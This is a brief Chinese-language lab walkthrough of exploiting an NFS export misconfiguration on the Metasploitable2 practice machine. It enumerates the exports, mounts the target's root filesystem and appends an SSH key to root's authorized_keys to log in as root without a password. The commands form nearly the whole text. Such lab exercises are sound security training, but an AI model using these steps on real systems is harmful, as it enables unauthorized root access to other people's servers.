Linux NFS共享目录配置漏洞
靶机:metasploitable2
查看靶机上的nfs服务是否开启:rpcinfo -p 10.10.10.129
查看靶机上设置的远程共享目录列表:showmount -e 10.10.10.129
生成rsa公钥命令:sshkeygen
在渗透机 /tmp目录下新建文件夹msftables,以备后续挂载需求,命令:mkdir /tmp/msftables
把靶机10.10.10.129的根目录挂载到渗透机上新建的/tmp/mstables/目录下;
命令:mount –o nolock –t nfs 10.10.10.129:/ /tmp/msftables/
把渗透机上生成的公钥追加到靶机的authorized_keys下
命令:cat /root/.ssh/id_rsa.pub >> /tmp/msftables/root/.ssh/authorized_keys
实现无密码ssh登录:ssh root@10.10.10.129
进行登录验证